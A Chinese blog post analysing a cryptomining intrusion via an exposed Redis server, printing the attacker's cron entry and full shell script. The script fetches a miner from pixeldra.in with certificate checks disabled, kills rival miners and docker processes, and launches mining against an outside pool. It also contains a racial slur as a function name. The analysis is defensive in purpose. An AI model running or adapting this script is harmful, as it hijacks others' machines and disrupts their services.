一个黑客挖矿脚本的分析

4720阅读 0评论2018-09-28 forgaoqiang
分类:网络与安全

发现有人利用redis权限写入挖矿脚本

xxx(被入侵的主机):6379> get weaponZ

点击(此处)折叠或打开

  1. "\n*/7 * * * * wget -q -O- --no-check-certificate | bash\n"


点击(此处)折叠或打开

  1. #!/bin/bash
  2. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
  3. getLittletrump(){
  4.     ARCH=$(uname -i)
  5.     if [ "$ARCH" == "x86_64" ]
  6.     then
  7.         rm -rf /tmp/littletrump*
  8.         wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
  9.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  10.             then
  11.             curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
  12.             fi
  13.     elif [ "$ARCH" == "i386" ]
  14.     then
  15.         rm -rf /tmp/littletrump*
  16.         wget https://pixeldra.in/api/download/NxQkhz --no-check-certificate -O /tmp/littletrump
  17.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  18.             then
  19.             curl -sk https://pixeldra.in/api/download/NxQkhz -o /tmp/littletrump
  20.             fi
  21.     else
  22.         rm -rf /tmp/littletrump*
  23.         wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
  24.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  25.             then
  26.             curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
  27.             fi
  28.     fi
  29. }

  31. killNiggiz(){
  32.     ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
  33.     ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
  34.     ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
  35.     ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
  36.     ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
  37.     ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
  38.     ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
  39.     ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
  40.     ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
  41.     ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
  42.     ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
  43.     ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
  44.     ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
  45.     ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
  46.     ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
  47.     skill -KILL crypto-pool
  48.     skill -KILL nanopool
  49.     skill -KILL supportxmr
  50.     skill -KILL minexmr
  51.     skill -KILL dwarfpool
  52.     skill -KILL xmrpool
  53.     skill -KILL moneropool
  54.     skill -KILL xmr
  55.     skill -KILL monero
  56.     skill -KILL udevs
  57.     skill -KILL udevd
  58.     skill -KILL docker
  59.     skill -KILL hashvault
  60.     skill -KILL moneroocean
  61.     skill -KILL evolutions
  62. }

  64. killNiggiz

  66. PS2=$(ps aux | grep littletrump | grep -v "grep" | wc -l)
  67. if [ $PS2 -eq 0 ];
  68. then
  69.     getLittletrump
  70. fi
  71. chmod +x /tmp/littletrump
  72. chmod 777 /tmp/littletrump
  73. if [ $PS2 -eq 0 ];
  74. then
  75. /tmp/littletrump -o pool.t00ls.ru -k -B
  76. fi
函数名称居然叫做'杀死黑鬼',而且挖矿程序名称叫做“小川普”感觉是老美的家伙干的,挺猥琐的杀死其他人的挖矿进程,然后启动自己的进程挖矿


上一篇:PPC架构虚拟主机体验
下一篇:MQTT Essential 细节笔记总结(深入理解MQTT细节)